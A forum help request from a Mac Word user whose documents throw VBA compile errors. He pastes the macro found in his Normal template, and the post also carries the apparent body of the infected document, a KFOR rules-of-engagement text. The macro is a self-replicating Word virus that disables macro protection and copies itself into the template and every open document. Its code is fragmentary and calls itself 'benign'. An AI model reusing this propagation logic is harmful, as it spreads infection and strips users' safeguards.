I tried the first fix with global doc and nothing happened. IT
couldn't open word. So I dumped all of word and office 2000; then
reintalled office 2004.
Now as before: when I open a new doc inWord several windows open up -
the one requiring action state: COMPILE ERROR Only comments may
appaear after End Sub, End Function, or End Property. (Click OK ) I
click OK
THe top window aooears and ir's heading is "NORMAL - ThisDOCUMENT
Text of document reads as follows:
Private Sub Document_Open()
' This virus is an alteration of a virus which was
' designed to delete all files from one's C: drive on Dec 13th.
' This code is completely benign.
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3,
1) <> "'Anti-Smyser'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1)
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
= 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1)
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3,
1) <> "'Anti-Smyser'" Then
.CodeModule.DeleteLines 1, Application.Documents.Item(k) _
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
= 0 Then
.CodeModule.InsertLines 1,
NormalTemplate.VBProject.VBComponents _
.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
End If
Next k
End Sub
Private Sub Document_Close()
End Sub
Private Sub Document_New()
End Sub
OPLAN 31402
INTRODUCTION. The Rules of Engagement (ROE) contained in this
compendium are for the use of the Kosovo Force (KFOR) land forces,
when authorised in accordance with the procedure described in
paragraph 3.a. (2). of Annex E.
NUMBERED ROE. The following ROE, when authorised by the North Atlantic
Council (NAC), permit KFOR forces to use minimum force in the
circumstances specified under the ROE which follow:
L01 Use of minimum force to prevent any attempts by hostile
forces/belligerents to prevent the KFOR from discharging its duties is
L02 Use of minimum force to defend friendly forces and Persons with
Designated Special Status (PDSS) against hostile acts is authorised.
L03 Use of minimum force to defend friendly forces and Persons with
Designated Special Status (PDSS) against forces demonstrating hostile
intent is authorised.
L04 Use of minimum force to prevent the taking possession of or
destruction of force property is authorised.
L05 Use of minimum force to prevent the taking possession of or
destruction of property with designated special status is authorised.
Individual service personnel are to be informed when they are
protecting specific property on this basis.
L06 Use of minimum force to defend against intrusion by hostile
forces/ belligerents into Assembly Areas, Military Restricted Areas or
other areas designated by an Authorised Commander is authorised.
L07 Use of minimum force against any armed individuals who fail to
comply with instructions issued by KFOR personnel engaged in the
execution of their duties is authorised.
L08 Detention of hostile forces/belligerents who obstruct friendly
forces, but only after appropriate non-forcible attempts to negate
such obstruction have failed, is authorised.
L09 Detention of hostile forces/belligerents who attempt to enter
controlled areas, commit assaults on friendly forces, commit or
threaten to commit serious crimes against friendly forces or attack
friendly force property is authorised.
L10 Detention of civilians who obstruct the progress of friendly
forces whether by demonstration, riot, or other means is authorised.
L11 Detention of civilians who enter or attempt to enter, without
authority, any area controlled by friendly forces is authorised.
L12 Detention of civilians who commit any assault upon any member of
friendly forces is authorised.
L13 Detention of civilians who commit or threaten to commit a serious
crime in the presence of a member of friendly forces is authorised.
L14 Detention of civilians who attack friendly force property is
L15 Use of minimum force to prevent the escape of any detained person
is authorised. Any use of deadly force must be in accordance with the
Commander's Aide-Memoire.1
L16 Disarming armed individuals or groups which represent an actual
threat to the security of friendly forces is authorised.
L17 Seizure or destruction of arms, military equipment or vehicles
which represent an actual threat to the security of friendly forces is
L18 Firing of warning shots is authorised.
L19 Use of riot control means against non-belligerents in
circumstances deemed appropriate by an Authorised Commander is
L20 Use of indirect fire is authorised in accordance with paragraph
3.a. (10). of Annex E.
L21 Engaging targets acquired or identified by other than visual means
is authorised when approved by the Appropriate Unit Commander.
L22 Use of all illuminants or illumination systems is authorised.
L23 Searches of persons, vehicles, and property in the execution of
authorised duties, incidental to authorised detentions, or when there
are reasons to suspect the presence of arms, ammunition or military
equipment are authorised.
L24 Use of minimum force against hostile forces/belligerents or
targets which provide active support to hostile military actions
against friendly forces is authorised.
L25 Use of force against hostile forces/belligerents that have
committed a hostile act against friendly forces previously, but are
not presently committing a hostile act is authorised, provided such
action is reasonably proximate and meets the requirements of
timeliness, military necessity, and proportional/ minimum use of
L26 Use of minimum force, against an individual who unlawfully
commits, or is about to commit, an act which endangers life, or is
likely to cause serious bodily harm, in circumstances where there is
no other way to prevent the act, is authorised.
L27 After an appropriate warning has been given, use of electronic
emissions to jam or override desig transmissions in desig part of the
Federal Republic of Yugoslavia (FRY) is authorised.
L28 After an appropriate warning has been given, use of minimum force
to deny the use of desig element of media production, transmission or
associated relay system in desig part of the FRY is authorised.
L29 After an appropriate warning has been given, use of minimum force
to destroy desig element of media production, transmission or
associated relay system in desig part of the FRY is authorised.
L30 Unrestricted use of ECM is authorised.
L31 Detention of persons indicted by the International Criminal
Tribunal for the Former Yugoslavia with whom KFOR forces come into
contact in the execution of their assigned tasks is authorised.
Use of Force. The amount of force used in situations where use of
force is authorised is to be based on the judgement of the Appropriate
Unit Commander or individual on-scene commander consistent with the
requirements of Military Necessity and Proportional/Minimum Force as
outlined in this Annex.
Detention of Hostile Forces / Belligerents or Civilians. Once
detained, hostile forces/belligerents or civilians will be disarmed,
if necessary, and at the discretion of the on-scene commander, either
released or removed to designated sites for hand-over to military
police for eventual transfer to an appropriate representative of UNMIK
or another appropriate agency as determined by COMKFOR, as soon as
possible. Up until the detained person is handed over to UNMIK or
another appropriate agency, the on-scene commander may release any
detainee, if in his judgement, it is appropriate to do so. All
detained persons shall be treated humanely and in accordance with
internationally recognised standards of human rights.
Detention of Persons Indicted for War Crimes (PIFWC). Once detained,
persons indicted for war crimes by the International Criminal Tribunal
for the former Yugoslavia (ICTY) shall be handed over as soon as is
practicable to a representative of the Tribunal. At the latest, this
transfer should take place within 48 hours of the initial detention.
d. Warning Shots. When authorised by ROE, warning shots may be fired
whenever, in the opinion of the on-scene commander:
(1) They would deter an armed hostile or potentially hostile
individual or group or forces or belligerents from obstructing the
mission, or from threatening the safety of members of friendly forces,
PDSS, or vehicles under his command.
(2) It is necessary for the execution of the mission to manifest
resolve to an armed hostile or potentially hostile individual or group
or hostile forces/ belligerents.
(3) They would deter or prevent a civilian individual, group or crowd,
which poses a threat to the safety of members of friendly forces, PDSS
or force property under his command, from engaging those forces, PDSS
or force property.
e. Riot Control Means. Subject to sub-paragraph 6.a. of this
Appendix, riot control means may be employed against non-belligerents
at the discretion of the Appropriate Commander whenever, in his
judgement, the use of armed force or warning shots would be
inappropriate and:
(1) The safety of friendly forces or PDSS is threatened; or,
(2) Vehicles or property belonging to friendly forces or PDSS are
similarly threatened; or,
(3) the passage of friendly forces, PDSS, vehicles, or property with
designated special status under his responsibility is blocked by
civilians and in his judgement, the use of armed force or warning
shots is not, at that time, necessary.
f. Prevention of Serious Crimes.
(1) When authorised, appropriate measures, up to and including the use
of deadly force, may be used to prevent serious crimes in the
following circumstances:
(a) The ROE permit the use of force to protect PDSS against hostile
acts and against forces demonstrating hostile intent. Therefore,
COMKFOR may extend KFOR protection to specific groups or individuals
whom he perceives to be under threat.
(b) ROE L26 permits the use of minimum force, against an individual
who unlawfully commits, or is about to commit, an act which endangers
life, or is likely to cause serious bodily harm, in circumstances
where there is no other way to prevent the act.
(2) The ROE permit the on scene commander to detain civilians who
commit or threaten to commit a serious crime in the presence of a
member of friendly forces or to detain hostile forces/belligerents who
commit or threaten to commit serious crimes against friendly forces.
(3) All suspected serious crimes must be reported to the chain of
g. Provide Active Support. For the purpose of ROE L24, "provide
active support" means any action which directly or substantially
contributes to the hostile act by hostile forces/belligerents against
friendly forces, for example, a forward artillery observer/air
controller directing ground or air fire.
4. LIMITATIONS. Unless directed by COMKFOR or CINCSOUTH or in cases
of self-defence there is no authority to:
a. Fire at religious buildings or facilities, museums, or cultural or
historic works.
b. Fire into areas, buildings or houses populated by civilians.
c. Destroy bridges, tunnels, dams, or dikes.
d. Use herbicides except for the control of vegetation within or
around the defined perimeters of the compound of friendly forces.
5. PROHIBITIONS. It is prohibited to:
a. Use any incendiary weapon (this does not include use of ammunition
such as white phosphorous used solely for target marking or
identification, where incendiary purpose is not intended).
b. Employ a means of delivery of mines that cannot be directed at a
specific military objective.
c. Employ a means of delivery of mines which may be expected to cause
incidental loss of civilian life, injury to civilians, damage to
civilian objects, or combination thereof, which would be excessive in
relation to the concrete and direct military advantage anticipated.
d. Employ booby trap devices.
e. Destroy civilian buildings not being used for military purposes
except where such destruction has been authorised under ROE.
a. Weapons/Weapon Systems Restrictions. The use of certain weapons
and weapon systems is delegated to Appropriate Commanders as shown in
the table below.
1 Close Air Support Ordnance COMKFOR/ CINCSOUTH Battalion (Bn)
2 Attack Helicopters Same Brigade/Air Ground Task Force
3 Artillery Same Brigade/Air Ground Task Force
4 Air Defence Same Battalion
5 Mortars Battalion Company
6 Tank Battalion Company
7 Anti-Tank Battalion Company
8 Other Crew Served Weapons Battalion Company
9 Riot/Crowd Control Means SACEUR/ COMKFOR
11 Explosive Demolitions SACEUR/ COMKFOR
12 Attack against religious or cultural property SACEUR/ COMKFOR
b. Controlled Weapons/Ordnance. The use of the following weapons
systems and ordnance is to be strictly controlled as shown:
(1) Unattended Weapons. Unattended means of force, including booby
traps, are prohibited except that land mines could be authorised by
ROE, in which case they are subject to the restrictions in
sub-paragraphs 5.b. and 5.c. above and they are to be fenced and
clearly marked, remotely controlled or
self-destructing/self-deactivating as applicable. In addition, they
should be recorded and monitored and then cleared on completion of the
military operation as appropriate.
(2) Lethal or Incapacitating Chemical Weapons. The use of such
weapons is prohibited. However, riot control means are not included
within this category. When authorised, riot control means may be
employed, but only as authorised above or in self-defence.
c. Air Operations in Support of the Mission. Air support provides
an important degree of security to deployed friendly forces,
particularly when faced with significant hostile forces/belligerents.
The ROE for air forces operating in support of the mission are at
Appendix 3 (Air ROE).
d. Authority To Search. Persons, vehicles, and property may be
searched in the following situations and under the procedures set out
at Tab C:
(1) In execution of authorised duties.
(2) Incidental to authorised detentions.
(3) Where there are reasons to suspect the presence of arms,
ammunition or military equipment.
e. Authorised Commander. The following are Authorised Commanders
for land ROE:
f.Aide -Memoire, Soldier 's Card and Search Procedures. The
Aide-Memoire (Tab A) is NAC Guidance to KFOR commanders to be carried
out by trainers during training of commanders, Non-Commissioned
Officers (NCOs) and soldiers on how to implement the ROE and as an aid
to commanders in the field. The Soldier's Card (Tab B) is intended to
be used with the training program and in the field. It is a short
statement of guidance on authorised use of force in self-defence and
for the execution of the mission. It is intended that a Soldier's Card
be carried by each individual soldier. A soldier may carry a Soldier's
Card issued by COMKFOR or KFOR Troop Contributing Nations may issue
their own translations of the Soldier's Card issued by COMKFOR which
may include amplifying instructions issued by National forces in
accordance with Annex E paragraph 3.a. (1). (b). Tab C is NAC
Guidance on procedures for the conduct of searches by KFOR forces.
Translations of Tabs A, B or C or amplifying instructions issued by
forces must be developed in consultation with COMKFOR or CINCSOUTH as
TAB A Aide-Memoire for Kosovo Force Commanders.
TAB B Example of a Soldier's Card.
TAB C Search Procedures.
IF I try to close thie documents Apple-Q I get window: Micdrosoft
Visual Basics Thie command wil stop the debugger.
I click OK.
Thewn i Have a normal doc which I can work with, It can be a little
slow slometimes. If I were to save it and close it, Usually
re-opening causes the same strinf of erroneous screens opening. I've
also tried opening OLD docs from 12 months or longer and they are
treated the same way, Finally when clsoing out of work, it
inevitably crashes, asking if want to submit a report to Microsfot, I
did the first few times but then I gave up.
Does anyone else have this problem?
Thanks. SEAN